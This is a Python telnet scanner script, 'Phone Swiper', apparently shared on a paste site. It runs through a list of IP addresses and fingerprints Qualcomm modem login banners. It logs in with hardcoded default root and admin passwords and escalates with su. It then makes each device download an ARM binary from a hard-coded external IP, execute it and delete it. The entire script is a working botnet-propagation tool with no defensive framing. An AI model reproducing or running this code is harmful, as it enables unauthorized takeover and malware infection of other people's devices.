Phone Swiper By; LiGhT

1. #!/usr/bin/python
2. # phone swiper By; LiGhT
3. # You wanted it? Now you got it... fucking idiots
4. import threading, sys, time, random, socket, re, os
5.  
6. if len(sys.argv) < 2:
7.         print "Usage: python "+sys.argv[0]+" <list>"
8.         sys.exit()
9.  
10. ips = open(sys.argv[1], "r").readlines()
11. usernames = ["root", "admin"]
12. passwords = ["oelinux123", "admin"]
13. cmd = "cd /tmp; rm -rf tftp; wget http://46.166.148.149/lel4 -O tftp; chmod +x tftp; ./tftp; rm -rf tftp" #arm4 binary
14. count = 0
15. def readUntil(tn, string, timeout=15):
16.     buf = ''
17.     start_time = time.time()
18.     while time.time() - start_time < timeout:
19.         buf += tn.recv(1024)
20.         time.sleep(0.01)
21.         if string in buf: return buf
22.     raise Exception('TIMEOUT!')
23.  
24. class hackify(threading.Thread):
25.         def __init__ (self, ip):
26.             threading.Thread.__init__(self)
27.             self.ip = str(ip).rstrip('\n')
28.         def run(self):
29.         try:
30.             tn = socket.socket()
31.             tn.settimeout(8)
32.             tn.connect((self.ip,23))
33.         except Exception:
34.             tn.close()
35.         try:
36.             hoho = ''
37.             hoho += readUntil(tn, ":")
38.             if "mdm9625" in hoho: #non-root
39.                 r00t = 0
40.                 username = usernames[1]
41.                 password = passwords[1]
42.                 tn.send(username + "\n")
43.                 #print "[%s] sending non-root user"%(self.ip)
44.             elif "9615-cdp" in hoho: #root
45.                 r00t = 1
46.                 username = usernames[0]
47.                 password = passwords[0]
48.                 tn.send(username + "\n")
49.                 #print "[%s] sending root user"%(self.ip)
50.         except Exception:
51.             tn.close()
52.         try:
53.             hoho = ''
54.             hoho += readUntil(tn, "Password:")
55.             if "assword" in hoho:
56.                 tn.send(password + "\n")
57.                 #if r00t: print "[%s] sending root password"%(self.ip)
58.                 #if not r00t: print "[%s] sending non-root password"%(self.ip)
59.                 time.sleep(3)
60.         except Exception:
61.             tn.close()
62.         try:
63.             mp = ''
64.             mp += tn.recv(1024)
65.             if "#" in mp or "$" in mp:
66.                 if r00t: tn.send(cmd + "\n"); print "command sent %s!"%(self.ip); time.sleep(10); tn.close()
67.                 if not r00t: tn.send("su" + "\n"); readUntil(tn, "Password:"); tn.send(passwords[0] + "\n"); time.sleep(1); tn.send(cmd + "\n"); print "command sent %s!"%(self.ip); time.sleep(10); tn.close()
68.         except Exception:
69.             print "[%s] TIMEOUT"%(count)
70.             tn.close()
71.  
72. print "Total IPs: %s\n"%(len(ips))
73. for ip in ips:
74.     try:
75.         count += 1
76.         t = hackify(ip)
77.         t.start()
78.         time.sleep(0.01)
79.     except:
80.         pass